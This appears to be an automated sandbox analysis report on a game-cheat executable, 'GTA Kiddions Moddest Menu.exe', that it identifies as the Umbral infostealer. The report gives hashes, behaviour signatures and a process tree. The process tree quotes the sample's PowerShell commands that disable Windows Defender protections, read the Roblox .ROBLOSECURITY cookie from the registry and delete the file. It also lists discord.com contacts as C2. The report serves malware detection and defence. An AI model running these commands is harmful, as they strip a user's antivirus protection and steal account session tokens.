Analysis
-
max time kernel
104s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
15/04/2025, 06:58
Static task
static1
General
-
Target
GTA Kiddions Moddest Menu.exe
-
Size
760KB
-
MD5
eb423c6dc0da5974cb5dbbc694cdeb04
-
SHA1
cd0a59826f3283d611ec033235fbbe2fc8f127b7
-
SHA256
5a1dfadc21abdb14962162b1f82b57da371f86baddf890420b252f821dff2699
-
SHA512
f8fb1a032a44d809aff2d42a776978e9dc99117f20654aee3c51565378de0ba790995925934aa72787799aff29666c2da9dd655c9c400af3509a9f8209616e87
-
SSDEEP
12288:5jH1hK3ikszq3iNWu6GQzR2ERfm/L5ZQinoF0jJJ3HeCSCwaAt:5T1h+i1myNWujo++
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2428-3-0x0000000000400000-0x0000000000440000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3532 powershell.exe 2708 powershell.exe 5128 powershell.exe 748 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts GTA Kiddions Moddest Menu.exe -
Executes dropped EXE 1 IoCs
pid Process 2428 GTA Kiddions Moddest Menu.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 discord.com 26 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1380 set thread context of 2428 1380 GTA Kiddions Moddest Menu.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GTA Kiddions Moddest Menu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GTA Kiddions Moddest Menu.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4024 cmd.exe 5396 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3972 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5396 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2428 GTA Kiddions Moddest Menu.exe 3532 powershell.exe 3532 powershell.exe 2708 powershell.exe 2708 powershell.exe 5128 powershell.exe 5128 powershell.exe 5116 powershell.exe 5116 powershell.exe 748 powershell.exe 748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1380 GTA Kiddions Moddest Menu.exe Token: SeDebugPrivilege 2428 GTA Kiddions Moddest Menu.exe Token: SeIncreaseQuotaPrivilege 4168 wmic.exe Token: SeSecurityPrivilege 4168 wmic.exe Token: SeTakeOwnershipPrivilege 4168 wmic.exe Token: SeLoadDriverPrivilege 4168 wmic.exe Token: SeSystemProfilePrivilege 4168 wmic.exe Token: SeSystemtimePrivilege 4168 wmic.exe Token: SeProfSingleProcessPrivilege 4168 wmic.exe Token: SeIncBasePriorityPrivilege 4168 wmic.exe Token: SeCreatePagefilePrivilege 4168 wmic.exe Token: SeBackupPrivilege 4168 wmic.exe Token: SeRestorePrivilege 4168 wmic.exe Token: SeShutdownPrivilege 4168 wmic.exe Token: SeDebugPrivilege 4168 wmic.exe Token: SeSystemEnvironmentPrivilege 4168 wmic.exe Token: SeRemoteShutdownPrivilege 4168 wmic.exe Token: SeUndockPrivilege 4168 wmic.exe Token: SeManageVolumePrivilege 4168 wmic.exe Token: 33 4168 wmic.exe Token: 34 4168 wmic.exe Token: 35 4168 wmic.exe Token: 36 4168 wmic.exe Token: SeIncreaseQuotaPrivilege 4168 wmic.exe Token: SeSecurityPrivilege 4168 wmic.exe Token: SeTakeOwnershipPrivilege 4168 wmic.exe Token: SeLoadDriverPrivilege 4168 wmic.exe Token: SeSystemProfilePrivilege 4168 wmic.exe Token: SeSystemtimePrivilege 4168 wmic.exe Token: SeProfSingleProcessPrivilege 4168 wmic.exe Token: SeIncBasePriorityPrivilege 4168 wmic.exe Token: SeCreatePagefilePrivilege 4168 wmic.exe Token: SeBackupPrivilege 4168 wmic.exe Token: SeRestorePrivilege 4168 wmic.exe Token: SeShutdownPrivilege 4168 wmic.exe Token: SeDebugPrivilege 4168 wmic.exe Token: SeSystemEnvironmentPrivilege 4168 wmic.exe Token: SeRemoteShutdownPrivilege 4168 wmic.exe Token: SeUndockPrivilege 4168 wmic.exe Token: SeManageVolumePrivilege 4168 wmic.exe Token: 33 4168 wmic.exe Token: 34 4168 wmic.exe Token: 35 4168 wmic.exe Token: 36 4168 wmic.exe Token: SeDebugPrivilege 3532 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 5128 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeIncreaseQuotaPrivilege 5760 wmic.exe Token: SeSecurityPrivilege 5760 wmic.exe Token: SeTakeOwnershipPrivilege 5760 wmic.exe Token: SeLoadDriverPrivilege 5760 wmic.exe Token: SeSystemProfilePrivilege 5760 wmic.exe Token: SeSystemtimePrivilege 5760 wmic.exe Token: SeProfSingleProcessPrivilege 5760 wmic.exe Token: SeIncBasePriorityPrivilege 5760 wmic.exe Token: SeCreatePagefilePrivilege 5760 wmic.exe Token: SeBackupPrivilege 5760 wmic.exe Token: SeRestorePrivilege 5760 wmic.exe Token: SeShutdownPrivilege 5760 wmic.exe Token: SeDebugPrivilege 5760 wmic.exe Token: SeSystemEnvironmentPrivilege 5760 wmic.exe Token: SeRemoteShutdownPrivilege 5760 wmic.exe Token: SeUndockPrivilege 5760 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 1380 wrote to memory of 2428 1380 GTA Kiddions Moddest Menu.exe 96 PID 2428 wrote to memory of 4168 2428 GTA Kiddions Moddest Menu.exe 97 PID 2428 wrote to memory of 4168 2428 GTA Kiddions Moddest Menu.exe 97 PID 2428 wrote to memory of 4168 2428 GTA Kiddions Moddest Menu.exe 97 PID 2428 wrote to memory of 752 2428 GTA Kiddions Moddest Menu.exe 99 PID 2428 wrote to memory of 752 2428 GTA Kiddions Moddest Menu.exe 99 PID 2428 wrote to memory of 752 2428 GTA Kiddions Moddest Menu.exe 99 PID 2428 wrote to memory of 3532 2428 GTA Kiddions Moddest Menu.exe 101 PID 2428 wrote to memory of 3532 2428 GTA Kiddions Moddest Menu.exe 101 PID 2428 wrote to memory of 3532 2428 GTA Kiddions Moddest Menu.exe 101 PID 2428 wrote to memory of 2708 2428 GTA Kiddions Moddest Menu.exe 103 PID 2428 wrote to memory of 2708 2428 GTA Kiddions Moddest Menu.exe 103 PID 2428 wrote to memory of 2708 2428 GTA Kiddions Moddest Menu.exe 103 PID 2428 wrote to memory of 5128 2428 GTA Kiddions Moddest Menu.exe 105 PID 2428 wrote to memory of 5128 2428 GTA Kiddions Moddest Menu.exe 105 PID 2428 wrote to memory of 5128 2428 GTA Kiddions Moddest Menu.exe 105 PID 2428 wrote to memory of 5116 2428 GTA Kiddions Moddest Menu.exe 107 PID 2428 wrote to memory of 5116 2428 GTA Kiddions Moddest Menu.exe 107 PID 2428 wrote to memory of 5116 2428 GTA Kiddions Moddest Menu.exe 107 PID 2428 wrote to memory of 5760 2428 GTA Kiddions Moddest Menu.exe 109 PID 2428 wrote to memory of 5760 2428 GTA Kiddions Moddest Menu.exe 109 PID 2428 wrote to memory of 5760 2428 GTA Kiddions Moddest Menu.exe 109 PID 2428 wrote to memory of 2132 2428 GTA Kiddions Moddest Menu.exe 111 PID 2428 wrote to memory of 2132 2428 GTA Kiddions Moddest Menu.exe 111 PID 2428 wrote to memory of 2132 2428 GTA Kiddions Moddest Menu.exe 111 PID 2428 wrote to memory of 5864 2428 GTA Kiddions Moddest Menu.exe 113 PID 2428 wrote to memory of 5864 2428 GTA Kiddions Moddest Menu.exe 113 PID 2428 wrote to memory of 5864 2428 GTA Kiddions Moddest Menu.exe 113 PID 2428 wrote to memory of 748 2428 GTA Kiddions Moddest Menu.exe 115 PID 2428 wrote to memory of 748 2428 GTA Kiddions Moddest Menu.exe 115 PID 2428 wrote to memory of 748 2428 GTA Kiddions Moddest Menu.exe 115 PID 2428 wrote to memory of 3972 2428 GTA Kiddions Moddest Menu.exe 117 PID 2428 wrote to memory of 3972 2428 GTA Kiddions Moddest Menu.exe 117 PID 2428 wrote to memory of 3972 2428 GTA Kiddions Moddest Menu.exe 117 PID 2428 wrote to memory of 4024 2428 GTA Kiddions Moddest Menu.exe 119 PID 2428 wrote to memory of 4024 2428 GTA Kiddions Moddest Menu.exe 119 PID 2428 wrote to memory of 4024 2428 GTA Kiddions Moddest Menu.exe 119 PID 4024 wrote to memory of 5396 4024 cmd.exe 121 PID 4024 wrote to memory of 5396 4024 cmd.exe 121 PID 4024 wrote to memory of 5396 4024 cmd.exe 121 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 752 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe"C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe"C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5760
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:5864
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:748
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3972
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\GTA Kiddions Moddest Menu.exe" && pause3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5396
-
-
-
Network
MITRE ATT&CK Enterprise v16
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD511ffdc7b385ae56532cf2786fab19aab
SHA117f2e58c72c31ec8e4b2d00330147e162c1d3e9e
SHA25616ff12cf40ce1177646f742325e5b532be32852aa98f0a29fd8b81e148e50a8f
SHA5122fec97a96397de28f29215e7d50874a55129b443f9894b3a13b555398f661df2f7bd051acfbacc9e3340d51881a82d49e2edaf9fb7c4c976e675e8dc3f2ed35d
-
Filesize
17KB
MD55d539369ebc08ac30655fd1ec75037f3
SHA1f8190988ceaf64edbfb782ca0753e5d542bda34c
SHA2562cc5614cc6da6bf960b1ed3eaa40d3367349e45180409e7cd58c38cbc1c8ac5a
SHA51215dd8ba0dd9a5e1aab465e530b048c47a112da077ee0adc9f590552b2c932c2d9d2c5cb0e9475f75a110104e403c5d976b0c415cb28bd98ff32e8d9b94e33ecb
-
Filesize
18KB
MD53b177b18761ffd48cebff742cbe8482c
SHA1eef2204a6bfe01c7a1e7229d001e1d67751b8c2c
SHA256f8e3dba9f21640c8b16d10ea7ae2b231824f5498100390854a6c87ce0b63a815
SHA5128797bedbe0506fbe6868061856a8a9db1565d7745e26d8d568eaaaf61fdf16f7476cac854d3264fba8f88f10e4e9022d6df4522ca67045fe50331ec0318ec0b6
-
Filesize
15KB
MD547608171c8a40e40fa1873cef4393cb9
SHA1ccf4b9b88beb98c77934e8c015ac0b7d3f04616a
SHA2566346fb34d7df08137950158223ae791257422ad2caa65662f8f7e6b9512714f7
SHA5121accf7f4691c9a487e70063220d63b6d6b507683b7731599f233f3a5c87bb3183b5ada0904c6ef7994d24219c064c41f4c296c761da33ed730eb1fc19df9f27f
-
Filesize
760KB
MD5eb423c6dc0da5974cb5dbbc694cdeb04
SHA1cd0a59826f3283d611ec033235fbbe2fc8f127b7
SHA2565a1dfadc21abdb14962162b1f82b57da371f86baddf890420b252f821dff2699
SHA512f8fb1a032a44d809aff2d42a776978e9dc99117f20654aee3c51565378de0ba790995925934aa72787799aff29666c2da9dd655c9c400af3509a9f8209616e87
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82